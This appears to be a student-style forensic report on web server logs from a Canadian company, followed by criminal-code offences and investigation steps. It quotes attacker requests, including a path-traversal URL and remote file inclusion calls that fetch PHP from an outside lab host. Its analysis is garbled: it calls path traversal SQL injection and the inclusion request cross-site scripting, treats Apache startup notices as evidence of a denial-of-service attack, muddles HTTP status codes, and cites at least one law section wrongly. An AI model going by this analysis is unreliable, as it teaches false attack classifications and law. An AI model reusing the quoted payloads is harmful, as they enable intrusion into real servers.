Attack Analysis
Introduction
Following a complainant reporting that their company’s web servers have been subjected to attacks, an analysis was conducted to understand the attacks. This report provides the elements requested for attacks and offenses by identifying the successful attacks and those that were not successful. It also provides the infractions, including the criminal offense committed against the company concerning the Canadian justice code and the next steps in the investigation.
Successful Attacks
SQL Injection
Also known as SQLI, it is an attack that involves the attacker employing malicious code to manipulate the backend database on a webserver to gain aces to information that is not intended for display. The attacker also can apply the SQL injection vulnerabilities to bypass the web application security measures. The SQL injection attack enables the attacker to select and output data from the web database, alter the database, add new data, delete records, and access the operating system through the database server. Based on the documents of access and error logs on the company’s server, the attacker with an IP address 24.122.48.222 successfully executed the SQL injection to access the company data. The following script can identify the SQL injection:
24.122.48.222 – – [29/Jan/2020:12:47:34 -0400] “GET /cgibin/afficheTexte.pl?page=../../../../lab6/secret HTTP/1.1” 200 75 “-”
The script indicate that the attacker, with IP address 24.122.48.222 attempted to access the lab6 secretes, with 2XX status code of 200 indicating a successful HTTP request was created which contained the results of the action requested.
Cross Site Scripting
Cross-site scripting (XSS) is a web security vulnerability that enables the attacker to send their own code into a web application through malicious executable scripts, such as Flash, Java, HTML, and Ajax. Successful cross-site scripting allows the attacker to impersonate the victim user and create a user account, perform the action that the user is able to conduct, read the data of the user, capture the access credentials, and perform the action to cause dysfunctions, such as injecting trojan into the web site. The record lines that indicate that the cross-site scripting was successfully conducted by the attacker, with an IP address 24.122.48.222, include:
24.122.48.222 – – [29/Jan/2020:13:00:59 -0400] “GET /rfi/affiche.php?var=http://cy140.lab/rien.php HTTP/1.1” 302 727 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”
The script indicates that the request was found and moved to another URL, with 302 having been superseded by 303 indicating that the attacker was able to temporary redirect by moving the original describing phrase. The Web uses the 302 status code as a distinction of a status code that was successfully added.
Denial-of-service (DDoS) and Malware
The attacker uses the malware attack, particularly the drive-by attack, which involves feeding malicious script into the PHP or HTTP in the web pages to redirect the browser of the victim into the control of the attacker. The deployment of the drive-by attack results in the Denial-of-Service (DoS) as the user finds it difficult to access the service requested. The script below generated from IP address 24.122.48.222 indicates the attacker successfully deployed a drive-by attack to execute the DoS.
[Wed Jan 08 13:53:40 2020] [notice] Digest: done
mutexes based on 256 max processes and 0 max threads.
[Wed Jan 08 13:53:40 2020] [notice] Digest: generating secret for digest authentication …
[Wed Jan 08 13:53:40 2020] [notice] mod_python: Creating 4 session mutexes based on 256 max processes and 0 max threads.
Unsuccessful Attack
File inclusion Attack
File inclusion involves the attacker accessing unauthorized or sensitive files on the webserver using the ‘include’ functionality. The attacker utilizes the file inclusion vulnerability due to bad input validation mechanisms by the user, whereby the user’s input passed to the file does not include proper validation. The attacker could not execute the file inclusion vulnerability attack, which would have to enable him to execute a malicious code on the server or enable the server to reveal sensitive files present. An example of a failed file inclusion attack from the logs analysis is provided below. The user of an IP address 24.122.48.222 received a 404 client error when requesting the lab data’s inclusion indicating that the request source was not found.
[Wed Jan 29 12:49:55 2020] [error] [client 24.122.48.222] PHP Warning: include(http://cy140.lab/data.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.1 404 Undescribedrn in /var/www/html/rfi/affiche.php on line 3
The hacker created the user 192.168.2.106. However the user was not an administrator.
The Infractions
Based on the identified attacks, the criminal offenses committed against the complainant with regard to the Canadian justice code are cybercrime. Cybercrime in Canadian criminal offense is defined under four categories that include cyber-dependent crimes, computer-supported crimes, cyber-enabled crimes, and national security offenses. The cybercrime committed against the complaint is the cyber-dependent crime, which involves the use of the computer, its network, and other technologies (Lukings and Lashkari, 2020). The types of crime and their respective criminal offense with regard to the criminal code provisions of Canada that can be linked to the report include:
Hacking: Section 184 of the criminal provision code, which prohibits fraudulent attainment of any computer service or intercepting the function of a computer to obtain or use private information. The offender faces up to five years imprisonment. Based on the report, the complainant’s severe attacks included unauthorized access to sensitive files and documents.
Denial-of-Service (DoS) attacks: Section 430(1.1) of the criminal provision code, which prohibits mischief that involves interrupting, obstructing, or interfering with the lawful use of computer data or denying a person entitled to a computer access their access. The offenders face a maximum of ten years imprisonment for the offense. The report indicates that the server owners had difficulties or denied access to various web server services due to the DoS attack.
Malware: Section 430 of the Canadian criminal provision code stipulates that it is a criminal offense to willfully interfere, access, or damage computer data without authorization or deny the computer owner access to the data. The offender face up to ten years imprisonment. The report indicates that the attacker attempted to interfere and access the company’s data.
Steps in the Investigation
Following the identification of the attacks against the company’s web server, the evidence gathered is used to bring civil or other private action against the perpetrator. The incident is to be reported to the Royal Canadian Mounted Police (RCMP), which under the National Cyber Security Strategy is responsible for coordinating cybercrime investigations and providing prosecution advice (Wasser & Pennington, 2020). The evidence and the investigation will create the basis for the company to bring a class-action lawsuit against the attacker, including violation of privacy, breach of consumer protection legislation, and breach of confidence.
References
Luking, M., & Lashkari, A. (2020). Understanding Canadian cybersecurity laws: Interpersonal privacy and cybercrime — Criminal Code of Canada (Article 4). IT World Canada. Retrieved from https://www.itworldcanada.com/blog/understanding-canadian-cybersecurity-laws-interpersonal-privacy-and-cybercrime-criminal-code-of-canada-article-4/440337
Wasser, L., & Pennington, K. (2020). Canada: Cybersecurity Laws and Regulations. The International Comparative Legal Guide. Retrieved from https://iclg.com/practice-areas/cybersecurity-laws-and-regulations/canada
